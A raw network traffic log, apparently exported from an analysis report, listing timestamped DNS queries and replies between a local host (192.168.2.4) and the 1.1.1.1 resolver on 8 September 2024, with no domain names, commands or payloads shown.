                                                                                                                                                                                                            Sep 8, 2024 09:00:04.485594034 CEST5088153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.488648891 CEST5783253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.499950886 CEST53578321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.501502991 CEST53508811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.691389084 CEST6275353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.695019007 CEST5188553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.696173906 CEST5424853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.697750092 CEST5123653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.701677084 CEST6471553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703326941 CEST5132953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703948975 CEST5261353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.704687119 CEST5828553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705410004 CEST5604253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705952883 CEST5453453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.706546068 CEST6549953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.707727909 CEST6304053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.709768057 CEST5011653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.711961985 CEST5240653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.714731932 CEST6444053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.715356112 CEST5666053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.716278076 CEST5178353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.717758894 CEST5503253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.719320059 CEST5246353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.720448017 CEST5126753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.722062111 CEST5617253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.723752022 CEST6388953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.725835085 CEST5177053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.727046013 CEST5499253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.729923010 CEST6053353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.730540991 CEST6521753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.732429028 CEST5265053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.733490944 CEST6015353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.735172987 CEST6294153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.736828089 CEST5462853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.738667011 CEST5283953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.740394115 CEST5926853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.742360115 CEST6349353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.743976116 CEST5007053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.745595932 CEST5400653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.747392893 CEST5476753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.748961926 CEST5557453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.750879049 CEST6163653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.752198935 CEST5648353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.753921032 CEST5189153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.754513979 CEST6254953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.757196903 CEST5391653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.759042978 CEST5531553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.760776043 CEST5961753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.761614084 CEST6229353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.763737917 CEST6018753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.765528917 CEST5495753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.767229080 CEST5255953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.768727064 CEST6457653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.771513939 CEST5236253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.773401022 CEST6418453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.774806023 CEST6331753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.776549101 CEST6515653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.777193069 CEST6079653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.778660059 CEST6409953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.780349970 CEST5240853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.781853914 CEST6040253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.783545017 CEST5217153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.785105944 CEST5549453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.787352085 CEST5673553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.788901091 CEST6434453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.789273024 CEST5244853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.792933941 CEST5178053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.793564081 CEST6136853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.892139912 CEST53545341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.892748117 CEST53560421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893079042 CEST53555741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893090010 CEST53644401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893099070 CEST53524061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893215895 CEST53630401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893373013 CEST53528391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893528938 CEST53501161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893672943 CEST53500701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893820047 CEST53564831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893830061 CEST53540061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893943071 CEST53512671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893953085 CEST53547671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893961906 CEST53550321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893973112 CEST53638891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893982887 CEST53542481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.893992901 CEST53629411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894001961 CEST53546281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894085884 CEST53523621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894094944 CEST53592681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894104004 CEST53634931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894114971 CEST53549571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894200087 CEST53517701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894212008 CEST53605331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894221067 CEST53517831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894364119 CEST53561721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894375086 CEST53526501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894383907 CEST53526131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894395113 CEST53616361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894406080 CEST53601531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894413948 CEST53549921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894501925 CEST53518911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894655943 CEST53554941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894665956 CEST53641841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894675016 CEST53607961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894795895 CEST53613681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894961119 CEST53524081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.894970894 CEST53633171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.895111084 CEST53622931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.895119905 CEST53651561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.895411015 CEST53521711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.895581961 CEST53525591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.895592928 CEST53567351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.896356106 CEST53640991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.898142099 CEST53513291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.898910046 CEST53627531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.899080038 CEST53518851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.899091005 CEST53647151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.899099112 CEST53582851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.899769068 CEST53524631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.900806904 CEST53596171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.900819063 CEST53601871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.900825024 CEST53553151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.900840044 CEST53566601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.901124001 CEST53625491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.901942015 CEST53524481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.901959896 CEST53517801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.902216911 CEST53652171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.904495001 CEST53645761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.041696072 CEST53512361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.043484926 CEST53604021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.045013905 CEST53654991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.048024893 CEST53643441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.054189920 CEST53539161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.530358076 CEST6251753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.530572891 CEST5919653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.534517050 CEST5998053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.538332939 CEST6484653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.540702105 CEST5307053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.541181087 CEST53625171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.545769930 CEST53591961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.548136950 CEST53648461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.550255060 CEST53530701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.551024914 CEST53599801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.564848900 CEST5517953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.565038919 CEST5392753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.565490007 CEST6029353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.574510098 CEST53539271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.574722052 CEST53602931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594434977 CEST5178853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594669104 CEST5918753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.594954967 CEST6234453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.595366955 CEST6393053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.595680952 CEST53551791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.604971886 CEST53517881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.605770111 CEST53591871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.608897924 CEST5955953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.610737085 CEST53639301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.610971928 CEST53623441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.615289927 CEST6542453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.620177984 CEST53595591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.624833107 CEST53654241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.638047934 CEST6429553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.638452053 CEST6066353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639389992 CEST6098853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639733076 CEST6038453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.639925003 CEST6234953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640091896 CEST5201753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640710115 CEST5654053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.640847921 CEST5989353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641074896 CEST4978753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641258955 CEST6444653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641426086 CEST6396153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.641582012 CEST4925153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.647237062 CEST53642951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.649420977 CEST53623491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.650010109 CEST53609881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.650023937 CEST53497871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.650034904 CEST53644461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.651169062 CEST53492511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654295921 CEST6502553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654480934 CEST5425753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654802084 CEST5551153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654844046 CEST5195053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.654937029 CEST53606631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.655095100 CEST4947453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.658792019 CEST53520171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.658807039 CEST53598931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.658818960 CEST53603841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.663219929 CEST53542571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.664444923 CEST53555111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.665595055 CEST53494741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.666110992 CEST5385353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.668776035 CEST5147153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.668976068 CEST5852153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669051886 CEST6503353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669240952 CEST5570853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669399023 CEST5429153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669712067 CEST5296353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.669902086 CEST5645953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.670048952 CEST5606853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.670213938 CEST53519501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.670279980 CEST5300053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.678308964 CEST53650331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.678390026 CEST53542911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.678749084 CEST53560681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.678894997 CEST53514711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.679101944 CEST53529631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.679217100 CEST53530001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.679282904 CEST53564591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.682329893 CEST53538531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696738958 CEST4949353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696945906 CEST5257353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.696990967 CEST5335153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697166920 CEST6278253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697355986 CEST5386653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697391987 CEST5755353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697592020 CEST6049153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697738886 CEST5855653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697933912 CEST5225653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.697933912 CEST5926853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698167086 CEST6216653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698266983 CEST5710153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698422909 CEST5347653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698482037 CEST5629153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698641062 CEST53585211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698663950 CEST5634653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698879957 CEST5760453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.699449062 CEST5423953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.699686050 CEST5135353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.704468012 CEST53592681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.705569029 CEST6026653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.705753088 CEST6165653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706259012 CEST5356853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706427097 CEST53525731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706717014 CEST53585561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706728935 CEST53575531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706799030 CEST5109353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706990004 CEST6347453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707046032 CEST53538661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707211971 CEST53522561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707477093 CEST53627821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707717896 CEST53576041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707729101 CEST53604911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.707798004 CEST53534761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.708745956 CEST53563461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.708779097 CEST53542391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.709686995 CEST53513531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.712059021 CEST53533511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.712277889 CEST53494931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.713798046 CEST53562911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.715310097 CEST53602661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.715738058 CEST53616561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.716098070 CEST53510931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.716767073 CEST53535681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.729387045 CEST53571011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.729404926 CEST53621661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.798053026 CEST53639611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.812403917 CEST53650251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.814209938 CEST53565401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.824095011 CEST53557081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.871745110 CEST53634741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.392051935 CEST5692653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.393167019 CEST6241753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.395876884 CEST6378053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.397186995 CEST5999253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.400741100 CEST6235653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.400867939 CEST6252753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.404062033 CEST53624171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.405061960 CEST5243353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.405431032 CEST53637801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.410645962 CEST53623561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.412934065 CEST6489653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.413288116 CEST5243453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.414892912 CEST53524331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.415553093 CEST53625271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.423871994 CEST53569261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.427295923 CEST53599921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.428831100 CEST53648961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.428946018 CEST53524341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.431855917 CEST5105553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.447591066 CEST53510551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.466731071 CEST5691353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.466928005 CEST5425253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467081070 CEST5704253192.168.2.41.1.1.1
